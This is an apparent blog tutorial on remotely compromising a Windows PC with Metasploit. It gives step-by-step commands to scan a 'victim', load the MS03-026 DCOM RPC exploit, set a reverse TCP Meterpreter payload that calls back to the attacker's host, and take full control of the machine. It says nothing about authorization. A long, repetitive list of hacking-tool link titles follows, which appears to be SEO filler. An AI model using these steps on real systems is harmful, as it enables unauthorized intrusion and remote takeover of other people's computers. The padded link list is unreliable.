HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
More articles
  1. Pentest Tools Review
  2. Pentest Box Tools Download
  3. Hackrf Tools
  4. Hack Tools Download
  5. Pentest Tools Apk
  6. Hacking Tools Download
  7. Hacking Tools And Software
  8. Pentest Tools For Android
  9. Hack Rom Tools
  10. Pentest Tools Bluekeep
  11. Pentest Tools Apk
  12. Hack Tools
  13. Wifi Hacker Tools For Windows
  14. Hacker Tools For Mac
  15. Hack Rom Tools
  16. Tools For Hacker
  17. Hack Tools Github
  18. Hacker Tools Hardware
  19. Easy Hack Tools
  20. Hacker Tools Software
  21. Hacker Tools
  22. Hacking Tools Kit
  23. Hacking Tools Windows 10
  24. Nsa Hack Tools Download
  25. Hacking Tools Mac
  26. How To Install Pentest Tools In Ubuntu
  27. Hacker Tools 2019
  28. Pentest Tools Open Source
  29. Hacking Tools
  30. Hack App
  31. Hacking Tools For Games
  32. Hacking Apps
  33. Hacker Security Tools
  34. Hacking Tools For Games
  35. Pentest Tools Android
  36. Hacking Tools 2020
  37. Github Hacking Tools
  38. Hacker Tools Linux
  39. Computer Hacker
  40. Hack Tools
  41. Hacker Tools Apk
  42. Best Hacking Tools 2020
  43. Hacking Tools Download
  44. Hacking Tools Usb
  45. Hacking Tools For Windows 7
  46. Hacking Tools Software
  47. Pentest Tools Port Scanner
  48. Blackhat Hacker Tools
  49. Tools Used For Hacking
  50. Hacker Tools Linux
  51. Hacker Tools Hardware
  52. Hack Tools For Pc
  53. Hack Rom Tools
  54. Hack Tools Github
  55. Free Pentest Tools For Windows
  56. Hacker Tools Mac
  57. Best Hacking Tools 2019
  58. Hacking Tools For Beginners
  59. Hackers Toolbox
  60. Pentest Tools Free
  61. Pentest Tools Free
  62. Pentest Tools Url Fuzzer
  63. Hacker Tools Apk
  64. How To Make Hacking Tools
  65. Hak5 Tools
  66. Kik Hack Tools
  67. Black Hat Hacker Tools
  68. What Are Hacking Tools
  69. Hacking Tools 2020
  70. Hacker Security Tools
  71. Hacks And Tools
  72. Hacking Tools Name
  73. Hack Apps
  74. Best Hacking Tools 2019
  75. Pentest Tools Open Source
  76. Hacker Tools Free Download
  77. Nsa Hacker Tools
  78. Hacking Tools Pc
  79. How To Make Hacking Tools
  80. Hacking Tools Hardware
  81. Hacker Tools Linux
  82. Pentest Tools Windows
  83. Hacker
  84. Pentest Tools Linux
  85. Hacking Tools For Beginners
  86. How To Hack
  87. Hacker Tools For Mac
  88. Hacker Tools Free Download
  89. Hacking Tools Hardware
  90. Nsa Hacker Tools
  91. Hacker Tools Windows
  92. Best Pentesting Tools 2018
  93. Hack Website Online Tool
  94. Hacker Tools Github
  95. Pentest Tools Alternative
  96. Ethical Hacker Tools
  97. Hacker Tools Apk
  98. Computer Hacker
  99. Github Hacking Tools
  100. Hacking Tools Name
  101. Easy Hack Tools
  102. World No 1 Hacker Software
  103. Hacker
  104. Hacking Tools Hardware
  105. Hacking Tools For Windows Free Download
  106. Hacker Tools For Pc
  107. New Hack Tools
  108. Hacking Tools Usb
  109. Hacker Tools Github
  110. Black Hat Hacker Tools
  111. What Is Hacking Tools
  112. Usb Pentest Tools
  113. Hacker Search Tools
  114. Tools 4 Hack
  115. Install Pentest Tools Ubuntu
  116. Hack Tools
  117. Hack Tools 2019
  118. Hacker Tool Kit
  119. Growth Hacker Tools
  120. Hack Website Online Tool
  121. Best Pentesting Tools 2018
  122. Pentest Tools Android
  123. Hacker Tools Github
  124. Hacker Tools Software
  125. Pentest Tools Review
  126. Hack Tools For Ubuntu
  127. Growth Hacker Tools
  128. New Hack Tools
  129. New Hacker Tools
  130. Hack Tools For Mac
  131. Easy Hack Tools
  132. Hacking Tools For Windows
  133. Best Hacking Tools 2019
  134. Kik Hack Tools
  135. Hackrf Tools
  136. Hack Tools Download
  137. Pentest Tools Download
  138. Physical Pentest Tools
  139. Pentest Tools Website Vulnerability
  140. Hacking Tools 2019
  141. Hack Tools Github
  142. Android Hack Tools Github
  143. Hacking Tools 2020
  144. Pentest Tools Alternative
  145. Pentest Tools Bluekeep
  146. Ethical Hacker Tools
  147. Pentest Tools For Android